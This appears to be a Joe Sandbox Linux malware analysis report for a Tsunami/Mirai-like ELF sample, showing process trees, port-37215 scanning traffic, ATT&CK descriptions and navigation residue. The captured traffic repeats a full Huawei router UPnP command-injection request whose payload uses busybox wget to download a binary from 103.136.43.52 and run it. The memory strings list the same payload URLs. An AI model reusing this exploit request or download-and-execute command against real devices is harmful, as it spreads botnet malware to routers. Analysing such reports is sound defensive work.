May 14, 2022 02:11:43.853008032 CEST	36087	37215	192.168.2.23	197.214.23.182
May 14, 2022 02:11:43.853012085 CEST	36087	37215	192.168.2.23	197.206.62.232
May 14, 2022 02:11:43.853015900 CEST	36087	37215	192.168.2.23	197.124.22.206
May 14, 2022 02:11:43.853018999 CEST	36087	37215	192.168.2.23	197.184.140.81
May 14, 2022 02:11:43.853020906 CEST	36087	37215	192.168.2.23	197.250.210.57
May 14, 2022 02:11:43.853024006 CEST	36087	37215	192.168.2.23	197.136.52.80
May 14, 2022 02:11:43.853028059 CEST	36087	37215	192.168.2.23	197.124.1.248
May 14, 2022 02:11:43.853032112 CEST	36087	37215	192.168.2.23	197.6.126.211
May 14, 2022 02:11:43.853034973 CEST	36087	37215	192.168.2.23	197.102.183.254
May 14, 2022 02:11:43.853040934 CEST	36087	37215	192.168.2.23	197.205.107.207
May 14, 2022 02:11:43.853051901 CEST	36087	37215	192.168.2.23	197.111.221.67
May 14, 2022 02:11:43.853054047 CEST	36087	37215	192.168.2.23	197.218.223.114
May 14, 2022 02:11:43.853065968 CEST	36087	37215	192.168.2.23	197.190.240.70

HTTP Request Dependency Graph

192.168.0.14:80

127.0.0.1:80

System Behavior

Analysis Process: qJlf2SjoW4 PID: 6232, Parent PID: 6122

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	/tmp/qJlf2SjoW4
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6234, Parent PID: 6232

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6236, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6237, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6238, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6242, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6244, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6246, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6247, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: qJlf2SjoW4 PID: 6248, Parent PID: 6234

General

Start time:	02:11:43
Start date:	14/05/2022
Path:	/tmp/qJlf2SjoW4
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: gnome-session-binary PID: 6289, Parent PID: 1477

General

Start time:	02:13:01
Start date:	14/05/2022
Path:	/usr/libexec/gnome-session-binary
Arguments:	n/a
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Analysis Process: sh PID: 6289, Parent PID: 1477

General

Start time:	02:13:01
Start date:	14/05/2022
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: gsd-print-notifications PID: 6289, Parent PID: 1477

General

Start time:	02:13:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-print-notifications
Arguments:	/usr/libexec/gsd-print-notifications
File size:	51840 bytes
MD5 hash:	71539698aa691718cee775d6b9450ae2

Analysis Process: gsd-print-notifications PID: 6297, Parent PID: 6289

General

Start time:	02:13:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-print-notifications
Arguments:	n/a
File size:	51840 bytes
MD5 hash:	71539698aa691718cee775d6b9450ae2

Analysis Process: gsd-print-notifications PID: 6298, Parent PID: 6297

General

Start time:	02:13:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-print-notifications
Arguments:	n/a
File size:	51840 bytes
MD5 hash:	71539698aa691718cee775d6b9450ae2

Analysis Process: gsd-printer PID: 6298, Parent PID: 1

General

Start time:	02:13:01
Start date:	14/05/2022
Path:	/usr/libexec/gsd-printer
Arguments:	/usr/libexec/gsd-printer
File size:	31120 bytes
MD5 hash:	7995828cf98c315fd55f2ffb3b22384d

Analysis Process: xfce4-session PID: 6319, Parent PID: 1900

General

Start time:	02:13:33
Start date:	14/05/2022
Path:	/usr/bin/xfce4-session
Arguments:	n/a
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Analysis Process: rm PID: 6319, Parent PID: 1900

General

Start time:	02:13:33
Start date:	14/05/2022
Path:	/usr/bin/rm
Arguments:	rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Source: /tmp/qJlf2SjoW4 (PID: 6232)	Socket: 127.0.0.1::45837
Source: /tmp/qJlf2SjoW4 (PID: 6248)	Socket: 0.0.0.0::52869
Source: /tmp/qJlf2SjoW4 (PID: 6248)	Socket: 0.0.0.0::8080
Source: /tmp/qJlf2SjoW4 (PID: 6248)	Socket: 0.0.0.0::443
Source: /tmp/qJlf2SjoW4 (PID: 6248)	Socket: 0.0.0.0::37215
Source: /tmp/qJlf2SjoW4 (PID: 6248)	Socket: 0.0.0.0::23
Source: /tmp/qJlf2SjoW4 (PID: 6248)	Socket: 0.0.0.0::80
Source: /tmp/qJlf2SjoW4 (PID: 6248)	Socket: 0.0.0.0::0

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 33 36 2e 34 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.136.43.52 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: unknown	TCP traffic detected without corresponding DNS query: 197.71.249.223
Source: unknown	TCP traffic detected without corresponding DNS query: 197.50.163.183
Source: unknown	TCP traffic detected without corresponding DNS query: 197.120.164.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.161.139.231
Source: unknown	TCP traffic detected without corresponding DNS query: 197.176.129.73
Source: unknown	TCP traffic detected without corresponding DNS query: 197.202.224.34
Source: unknown	TCP traffic detected without corresponding DNS query: 197.174.71.85
Source: unknown	TCP traffic detected without corresponding DNS query: 197.140.69.244
Source: unknown	TCP traffic detected without corresponding DNS query: 197.183.140.121
Source: unknown	TCP traffic detected without corresponding DNS query: 197.80.175.154
Source: unknown	TCP traffic detected without corresponding DNS query: 197.195.177.70
Source: unknown	TCP traffic detected without corresponding DNS query: 197.180.136.59
Source: unknown	TCP traffic detected without corresponding DNS query: 197.47.193.131
Source: unknown	TCP traffic detected without corresponding DNS query: 197.138.198.220
Source: unknown	TCP traffic detected without corresponding DNS query: 197.133.224.147
Source: unknown	TCP traffic detected without corresponding DNS query: 197.185.83.175
Source: unknown	TCP traffic detected without corresponding DNS query: 197.37.169.30
Source: unknown	TCP traffic detected without corresponding DNS query: 197.33.57.180
Source: unknown	TCP traffic detected without corresponding DNS query: 197.228.131.62
Source: unknown	TCP traffic detected without corresponding DNS query: 197.126.175.118
Source: unknown	TCP traffic detected without corresponding DNS query: 197.40.251.106
Source: unknown	TCP traffic detected without corresponding DNS query: 197.232.198.99
Source: unknown	TCP traffic detected without corresponding DNS query: 197.11.39.246
Source: unknown	TCP traffic detected without corresponding DNS query: 197.93.91.51
Source: unknown	TCP traffic detected without corresponding DNS query: 197.147.5.250
Source: unknown	TCP traffic detected without corresponding DNS query: 197.140.219.27
Source: unknown	TCP traffic detected without corresponding DNS query: 197.51.21.7
Source: unknown	TCP traffic detected without corresponding DNS query: 197.69.89.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.51.178.46
Source: unknown	TCP traffic detected without corresponding DNS query: 197.138.238.6
Source: unknown	TCP traffic detected without corresponding DNS query: 197.124.18.175
Source: unknown	TCP traffic detected without corresponding DNS query: 197.104.143.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.229.146.204
Source: unknown	TCP traffic detected without corresponding DNS query: 197.226.39.74
Source: unknown	TCP traffic detected without corresponding DNS query: 197.163.223.43
Source: unknown	TCP traffic detected without corresponding DNS query: 197.255.104.118
Source: unknown	TCP traffic detected without corresponding DNS query: 197.224.168.3
Source: unknown	TCP traffic detected without corresponding DNS query: 197.32.253.105
Source: unknown	TCP traffic detected without corresponding DNS query: 197.182.181.107
Source: unknown	TCP traffic detected without corresponding DNS query: 197.134.123.184
Source: unknown	TCP traffic detected without corresponding DNS query: 197.14.50.78
Source: unknown	TCP traffic detected without corresponding DNS query: 197.35.168.165
Source: unknown	TCP traffic detected without corresponding DNS query: 197.82.180.60
Source: unknown	TCP traffic detected without corresponding DNS query: 197.153.127.201
Source: unknown	TCP traffic detected without corresponding DNS query: 197.78.154.198
Source: unknown	TCP traffic detected without corresponding DNS query: 197.254.172.58
Source: unknown	TCP traffic detected without corresponding DNS query: 197.72.207.173
Source: unknown	TCP traffic detected without corresponding DNS query: 197.227.139.19
Source: unknown	TCP traffic detected without corresponding DNS query: 197.213.249.182
Source: unknown	TCP traffic detected without corresponding DNS query: 197.186.42.81

Source: qJlf2SjoW4	String found in binary or memory: http://103.136.43.52/bin
Source: qJlf2SjoW4	String found in binary or memory: http://103.136.43.52/bins/Tsunami.mips;
Source: qJlf2SjoW4	String found in binary or memory: http://103.136.43.52/bins/Tsunami.x86
Source: qJlf2SjoW4	String found in binary or memory: http://103.136.43.52/zyxel.sh;
Source: qJlf2SjoW4	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: qJlf2SjoW4	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding//%22%3E
Source: qJlf2SjoW4	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: qJlf2SjoW4	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	API monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report qJlf2SjoW4

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: qJlf2SjoW4 PID: 6232, Parent PID: 6122

General

Analysis Process: qJlf2SjoW4 PID: 6234, Parent PID: 6232

General

Analysis Process: qJlf2SjoW4 PID: 6236, Parent PID: 6234

General

Analysis Process: qJlf2SjoW4 PID: 6237, Parent PID: 6234

General

Analysis Process: qJlf2SjoW4 PID: 6238, Parent PID: 6234

General

Analysis Process: qJlf2SjoW4 PID: 6242, Parent PID: 6234

General

Analysis Process: qJlf2SjoW4 PID: 6244, Parent PID: 6234

General

Analysis Process: qJlf2SjoW4 PID: 6246, Parent PID: 6234

General

Linux Analysis Report
qJlf2SjoW4